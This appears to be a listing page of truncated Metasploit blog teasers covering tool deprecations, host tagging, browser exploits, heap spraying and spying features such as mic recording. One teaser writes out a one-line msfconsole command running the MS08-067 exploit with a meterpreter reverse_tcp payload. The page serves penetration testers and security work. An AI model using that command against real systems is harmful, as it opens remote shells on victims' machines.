1 min
Msfcli is No Longer Available in Metasploit
Hi everyone,
This January, we made an announcement about the deprecation of Msfcli, the
command line interface version for Metasploit. Today we are ready to say
good-bye to it. Instead of Msfcli, we recommend using the -x option in
Msfconsole. For example, here's how you can run MS08-067 in one line:
./msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST [IP]; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST [IP]; run"
You can also leverage things like resource scripts o
1 min
MsfPayload and MsfEncode are Being Removed from Metasploit
Oh hi folks,
Last year on December 9th
[https://www.rapid7.com/blog/post/2014/12/09/good-bye-msfpayload-and-msfencode/]
, we made an official announcement about deprecating MsfPayload and MsfEncode.
They are being replaced by msfvenom. Well, today is the day we pull the plug. We
are currently in the process
[https://github.com/rapid7/metasploit-framework/pull/5509] of removing these two
utilities, and in a day or two you will never see them from upstream again.
If you are still not so familiar
5 min
Using Host Tagging in Metasploit for Penetration Testing
Hello my fellow hackers! Tag, you're it!
For today's blog post, I'd like to talk about host tagging a little bit in
Metasploit. If you are a penetration tester, a CTF player, or you just pop a lot
of shells like a rock star, then perhaps this will interest you. If you have
never used this kind of feature, then hopefully this blog post will bring you a
new idea on how to approach host management.
So what is host tagging? Well, the idea is simple really. It's a way to label
your targets and make
2 min
Haxmas
12 Days of HaXmas: Opening Up My Top Secret Metasploit Time Capsule
This post is the second in a series, 12 Days of HaXmas, where we take a look at
some of more notable advancements and events in the Metasploit Framework over
the course of 2014._
For today's HaXmas amusement, I have something fun to share with you all. So the
other day I was watching this movie called The Knowing
[https://www.youtube.com/watch?v=ikJ3t_tZf-E], an action-thriller starring
Nicolas Cage. The story of this movie begins with a school teacher telling the
students that as part of the s
3 min
Metasploit
Good-bye msfpayload and msfencode
Greetings all,
On behalf of the Metasploit's development teams, I'd like to officially announce
the decision of deprecating msfpayload and msfencode. Also starting today, we no
longer support or accept patches for these two utilities. On June 8th 2015, the
elderly msfpayload and msfencode will retire from the Metasploit repository, and
replaced by their successor msfvenom. The tool msfvenom is the combination of
msfpayload and msfencode, and has been in testing for more than 3.5 years.
msfpayl
3 min
Metasploit Weekly Update: Prison Break
Boy, that escalated quickly!
In this week's Metasploit [https://www.rapid7.com/products/metasploit/download/]
update, we'd like to introduce two sandbox escaping exploits for Internet
Explorer, and demonstrate how you're supposed to use them. The two we're
covering are MS13-097, an escape due to Windows registry symlinks. And MS14-009,
by exploiting a type traversal bug in .Net Deployment Service. We will also
briefly go over other new modules and new changes, and here we go.
Why You Need a S
14 min
Exploits
"Hack Away at the Unessential" with ExpLib2 in Metasploit
This blog post was jointly written by Wei sinn3r [https://twitter.com/_sinn3r]
Chen and Juan Vazquez [https://twitter.com/_juan_vazquez_]
Memory corruption exploitation is not how it used to be. With modern mitigations
in place, such as GS, SafeSEH, SEHOP, DEP, ASLR/FASLR, EAF+, ASR, VTable guards,
memory randomization, and sealed optimization, etc, exploit development has
become much more complicated. It definitely shows when you see researchers
jumping through hoops like reverse-engineering
3 min
Metasploit
Weekly Metasploit Update: Encoding-Fu, New Powershell Payload, Bug Fixes
I Got 99 Problems but a Limited Charset Ain't One
In this week's Metasploit weekly update, we begin with OJ TheColonial Reeves
[https://twitter.com/TheColonial]' new optimized sub encoding module (opt_sub.rb
). As the name implies, this encoder takes advantage of the SUB assembly
instruction to encode a payload with printable characters that are file path
friendly. Encoders like this are incredibly useful for developing a memory
corruption exploit that triggers a file path buffer overflow, where
4 min
Let's Talk About Your Security Breach with Metasploit. Literally. In Real Time.
During a recent business trip in Boston, Tod [https://twitter.com/todb] and I
sat down in a bar with the rest of the Metasploit team, and shared our own
random alcohol-driven ideas on Metasploit hacking. At one point we started
talking about hacking webcams. At that time Metasploit could only list webcams,
take a snapshot, stream
[/2014/01/03/donut-vigilante-raided-and-arrested-at-metasploit] (without sound),
or record audio
[/2013/01/23/the-forgotten-spying-feature-metasploits-mic-recording-c
3 min
Pwn Faster with Metasploit's Multi-Host Check Command
One of the most popular requests I've received from professional penetration
testers is that they often need to be able to break into a network as fast as
possible, and as many as possible during an engagement. While Metasploit Pro or
even the community edition already gives you a significant advantage in speed
and efficiency, there is still quite a large group of hardcore Framework users
out there, so we do whatever we can to improve everybody's hacking experience. A
new trick we'd like to in
4 min
Metasploit Now Supports Malware Analysis via VirusTotal
VirusTotal is a free online service that allows you to analyze files or URLs in
order to identify malware detectable by antivirus engines, and is one of the
most popular ones in the community, so we decided to get a piece of that action.
As offensive tool developers, we often find ourselves testing the capabilities
of different AV products. There are usually two ways to achieve this, of course.
You either spend some money and build your own lab, or you spend nothing and
just use VirusTotal's API
4 min
12 Days of HaXmas: Impress Your Family With Elite Metasploit Wizardry
This post is the fourth in a series, 12 Days of HaXmas, where we take a look at
some of more notable advancements in the Metasploit Framework over the course of
2013.
Every year during a major holiday, we crawl out from our own bat cave and
actually spend time with our family and friends. People start asking you what
you do for a living? You respond with something you probably regret like "I am a
penetration tester.", because to an average person your job title probably
sounds no different than
3 min
Metasploit Releases CVE-2013-3893 (IE SetMouseCapture Use-After-Free)
Recently the public has shown a lot of interest in the new Internet Explorer
vulnerability (CVE-2013-3893
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3893]) that has been
exploited in the wild, which was initially discovered in Japan. At the time of
this writing there is still no patch available, but there is still at least a
temporary fix-it that you can apply from Microsoft, which can be downloaded here
[http://technet.microsoft.com/en-us/security/advisory/2887505].
The nitt
4 min
New Heap Spray Technique for Metasploit Browser Exploitation
Browser vulnerabilities have always been serious threats in today's security
trends. It's almost becoming too common to see people dropping browser 0days to
beef up botnets, or deploying them for "sophisticated" APT-level attacks, etc.
Although browser 0days surface more frequently than ever, some of the techniques
don't seem to change much. The most common trick you'll see is a heap spray
[https:/
3 min
Metasploit
The Forgotten Spying Feature: Metasploit's Mic Recording Command
About two years ago, Metasploit implemented
[https://github.com/rapid7/metasploit-framework/commit/2e72926638b0fb972a26b2c1a3b040cf4cc224f2]
the microphone recording feature to stdapi thanks to Matthew Weeks
[https://twitter.com/scriptjunkie1]. And then almost a year ago, we actually
lost that command
[https://github.com/rapid7/metasploit-framework/commit/42719ab34bb9ca51d2cd623777662fc2253857f1]
due to a typo. We, and apparently everyone else, never noticed that until I was
looking at th